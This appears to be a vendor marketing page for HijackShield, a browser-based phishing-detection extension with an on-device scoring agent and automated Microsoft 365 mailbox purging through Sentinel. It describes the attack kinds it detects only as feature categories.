Phishing defense that works at the point of click
HijackShield detects and blocks every major corporate phishing technique in the browser — before credentials are entered, before malware downloads, before damage is done. When a page is blocked, zero-touch remediation traces the click back to the source email, classifies it, and purges every copy from every mailbox in the tenant — automatically, with no user or analyst action.
Three layers of protection. One browser extension.
Email & credential phishing
Cloned sign-in pages, fake login windows, remote-controlled browser sessions, and device-code consent scams — the Phishing-as-a-Service kits behind modern MFA-bypass attacks.
Malicious & compromised websites
Brand impersonation, ClickFix and tech-support scams, drive-by dangerous downloads, fraudulent online stores, and browser push-notification abuse.
Weaponized documents
Detects accounts-payable invoice fraud and PDFs built to exploit known document vulnerabilities (CVEs) — a first-pass screen that cuts manual review.
Email filters miss. Phishing lands. Then what?
Every email gateway misses phishing. Modern PhaaS kits evade security scanners with anti-analysis detection, CAPTCHA gates, and anti-debugger traps. BEC emails from compromised trusted senders often bypass filters entirely — especially when companies whitelist customer domains, add allow lists, or employees create inbox rules to ensure they never miss a message. By the time the SOC finds the threat, users have already clicked.
of breaches start with a phishing email that bypassed email security
typical time for SOC to manually find and purge phishing emails from all mailboxes
HijackShield automated remediation: user report to tenant-wide purge across all mailboxes
Real users on real machines defeat evasion
Email gateways analyze URLs in sandboxes. Phishing kits detect sandboxes and show clean pages. HijackShield runs in the user's actual browser on their actual endpoint — the kit's evasion defenses see a real user and present the real phishing page.
Two outcomes, both wins: either the phishing page renders and HijackShield blocks it instantly, or the kit exits early and the user never sees a threat. The evasion techniques that defeat email gateways are irrelevant at the browser layer.
For BEC attacks, HijackShield evaluates the page the link points to — not the email that delivered it. Sender reputation, inbox rules, Exchange whitelists — none of it matters. A phishing page is a phishing page regardless of who sent the link.
Why the browser layer wins
Every evasion that defeats a gateway is irrelevant to HijackShield — either the page renders and we block it, or it never renders and there's nothing to steal.
Two components. Entirely local detection.
No cloud dependency for protection. No latency. No data leaving the device for the scoring decision. Detection runs on-device on Windows today, with macOS on the near-term roadmap.
Browser extension scans every page
Works across Chrome, Edge, Brave, Opera, and Firefox. Analyzes the live DOM for phishing signals — login forms, brand impersonation, credential harvesting, hidden content loaded via JavaScript, and active credential theft behavior.
Local agent scores and decides
The on-device Go agent runs a hybrid ML model and 100+ heuristic rules. BLOCK, WARN, or ALLOW in milliseconds — with explainable reason tags showing exactly which detections fired and why.
Sentinel receives structured telemetry
Every detection and phishing report flows into Microsoft Sentinel with full context — device identity, detection tags, PhaaS kit fingerprint, email metadata — for automated response.
Every major phishing technique. Detected and blocked.
HijackShield is a behavior-based phishing defense — not a reputation checker or static page scanner. It combines an on-device ML model with deep heuristic analysis of rendered page content, browser-executed behavior, and active credential theft patterns.
AiTM proxy attacks
Detects the proxy-based attacks that bypass MFA through multiple independent layers: AiTM toolkit URL pattern analysis, full-viewport cross-origin iframe detection, client-side CAPTCHA gate detection, invisible Unicode obfuscation, and cloud static hosting fingerprinting. Covers Sneaky 2FA, Tycoon 2FA, EvilProxy, Salty 2FA, and Mamba 2FA.
Browser-in-the-Middle (BitM)
Identifies remote desktop streaming attacks via noVNC and Apache Guacamole using a 6-tier weighted indicator system — VNC infrastructure detection, full-viewport canvas analysis, keyboard event capture, and WebSocket inspection.
Browser-in-Browser (BitB)
Detects fake browser windows rendered in HTML that display spoofed URL bars showing legitimate domains like login.microsoftonline.com. Identifies window control elements, fake address bars, navigation buttons, and hardcoded IdP URLs in page content.
Device code phishing
Catches OAuth 2.0 Device Authorization Grant abuse, cross-brand lures (e.g., DocuSign-branded pages redirecting to Microsoft device login), and copy-paste instruction sequences.
Brand impersonation suite
Purpose-built detection for Microsoft, Google, Okta, Meta, LinkedIn, Amazon, and Apple impersonation — including ESTS login cloning, OTP/MFA flow faking, CSS logo recreation, and CDN asset analysis.
ClickFix attacks
Detects fake CAPTCHA pages that trick users into executing malicious PowerShell via Win+R, including clipboard manipulation, script pattern analysis, and suspicious iframe detection.
Hidden content & credential theft
Inspects browser-executed network behavior — not just the visible DOM. Catches phishing kits that load content via JavaScript POST requests and detects active credential exfiltration via fetch/XHR to suspicious endpoints.
Government impersonation
Covers 36 US agencies including 25 state DMVs, 3 toll systems (E-ZPass, SunPass, FasTrak), and 8 federal agencies (IRS, USPS, SSA). Detects kit fingerprints, CMS clones, and payment urgency scams.
Fraudulent e-commerce
Identifies BogusBazaar, CajiPay, and Cloud-Keeper card skimming operations with cross-origin iframe detection, platform mismatch analysis, and payment gateway fingerprinting.
Dangerous download protection
Multi-layer download protection with 82+ Remote Access Tool patterns (AnyDesk, TeamViewer, ScreenConnect, and more) and 90+ Potentially Unwanted Program signatures. Detects deceptive filenames and double extensions.
PhaaS kit fingerprinting
Identifies the specific kit responsible — Sneaky 2FA, Tycoon 2FA, EvilProxy, Salty 2FA, Mamba 2FA, EvilnoVNC, and Device Code Phishing — giving SOC teams immediate attribution on every blocked page.
Info-stealer detection
The local Go agent monitors credential stores (browser login data, cookies, tokens) for unauthorized access by non-browser processes. Detects Lumma, RedLine, Vidar, StealC, and other info-stealer malware targeting saved credentials.
Plus: blob URL credential harvesting, phishing kit DOM fingerprinting, HTML smuggling, tech support scam detection, cryptojacking prevention, SPA phishing kits, 24 optional security protections, and QR code phishing (quishing) delivery tagging.
Hybrid ML + heuristic scoring. Explainable decisions.
HijackShield doesn't rely on a single model or a reputation database. Every page is evaluated by an on-device ML URL classifier and a deep heuristic engine that analyzes 100+ signals from the rendered page, browser-executed behavior, and network activity.
The result is a composite score with full transparency. Every BLOCK and WARN decision includes reason tags showing exactly which detections fired — from specific brand impersonation indicators to phishing kit DOM patterns to credential exfiltration behavior. SOC analysts and end users alike can see why a page was blocked.
False positive mitigation is built into the scoring engine with legitimacy evidence signals: federated SSO buttons, payment processors, marketing analytics stacks, cookie consent frameworks, social brand links, and Schema.org markup all reduce scores. A sticky legitimacy cache preserves trust signals across late-arriving frame updates on complex sites.
What the scoring engine evaluates
Phishing probability from URL structure — typosquats, entropy, abused TLDs, lure keywords, punycode, path patterns
Login forms, brand assets, phishing kit DOM patterns, MFA impersonation, hidden login flows, text obfuscation
POST-loaded phishing content, credential exfiltration via fetch/XHR, clipboard manipulation, anti-debugging traps
Cloud static hosting, hex subdomain patterns, cross-origin iframes, suspicious external scripts, AiTM toolkit URLs
Federated SSO, payment processors, marketing stacks, cookie consent, social brand links, service workers, Schema.org
Zero-touch remediation. Every copy purged in minutes.
The moment a page is blocked, HijackShield analyzes the redirect chain to identify the clicked link, queries Microsoft Graph to find the source email and classify it, then drives a tenant-wide search and soft-delete through Sentinel. No user report. No analyst intervention. No manual Defender Threat Explorer searches.
Remediation is fast by design: the purge runs as a metadata Compliance Search against the mailbox index rather than a full-content crawl, so it scales across the tenant in minutes regardless of mailbox count. In testing across 1,372 mailboxes, the full pipeline — block to tenant-wide purge — completed in roughly 8 minutes end to end. A user-report path remains available too, which is handy for BYOD, contractors, and other unmanaged-device scenarios.
Three-scenario intelligence
Every blocked phish is auto-classified as External Phish, BEC Compromise, or Internal ATO — each triggers a different automated response appropriate to the severity.
BEC-safe purging
For known-sender BEC incidents, searches are scoped to sender AND subject — protecting legitimate past correspondence while eliminating the attack.
Internal ATO response
Internal sender incidents skip automated purge and post investigation guidance: revoke sessions, reset password, audit Entra sign-ins, check OAuth app consents.
Self-documenting incidents
Every remediation run posts a formatted summary to the Sentinel incident: items found, items purged, affected mailboxes, and full audit trail.
Dry run by default
Ships with Dry Run enabled. Validate the automation on real incidents before enabling live purge. Soft-delete only — nothing permanently removed.
Near-zero infrastructure cost
Sentinel and Logic Apps are pay-as-you-go. HijackShield generates kilobytes per alert. Even organizations that don’t use Sentinel today can spin up an instance specifically for this pipeline at essentially no cost.
Local detection. Cloud response.
Detection runs entirely on-device on Windows today, with macOS on the near-term roadmap. Sentinel integration adds enterprise telemetry and automated remediation without creating a dependency on cloud availability.
No cloud dependency
Detection works offline, on VPN, behind firewalls. No latency, no privacy exposure, no single point of failure. The agent is the only component that makes outbound calls.
Resilient delivery
Events that fail to deliver to Sentinel are queued to disk and retried with exponential backoff for up to 24 hours. Azure outages never cause data loss.
Works with any Microsoft 365
Automated remediation uses Compliance Search, available on every M365 plan from Business Basic up. No Defender for Office 365 Plan 2 or E5 upgrade required. Sentinel and Logic Apps are pay-as-you-go at negligible cost for alert-driven workloads.
NRT analytics rules
Pre-built Sentinel rules fire on every new event with dynamic severity, entity mapping, campaign grouping, and importable ARM templates.
Stop phishing at the point of click
Deploy HijackShield in minutes. Detect every major phishing technique. Automate tenant-wide remediation.